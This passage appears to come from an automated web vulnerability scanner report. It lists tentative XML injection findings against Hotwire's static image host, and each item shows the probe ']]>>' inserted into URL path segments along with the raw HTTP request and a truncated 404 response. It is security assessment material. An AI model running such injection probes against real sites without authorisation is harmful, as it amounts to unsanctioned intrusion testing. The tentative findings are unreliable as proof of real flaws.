GET /static/images/global/background]]>>/sidebar-title-module-top-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.96. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-title-module-top-right-corner.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:06 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.97. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/bullets/red-bullet-img.gif?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.98. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/bullets/red-bullet-img.gif?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.99. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/bullets/red-bullet-img.gif?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.100. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/bullets]]>>/red-bullet-img.gif?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535954
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.101. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/bullets/red-bullet-img.gif]]>>?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.102. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/buttons/promo-button-red.gif?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.103. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/buttons/promo-button-red.gif?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.104. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/buttons/promo-button-red.gif?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:04 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.105. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/buttons]]>>/promo-button-red.gif?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:07 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.106. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/buttons/promo-button-red.gif]]>>?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.107. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/about-your-hotel-headline.gif?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.108. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/about-your-hotel-headline.gif?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535947
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.109. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/about-your-hotel-headline.gif?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.110. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/about-your-hotel-headline.gif?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535994
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.111. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/about-your-hotel-headline.gif]]>>?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:13 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.112. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/car_icon.jpg?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
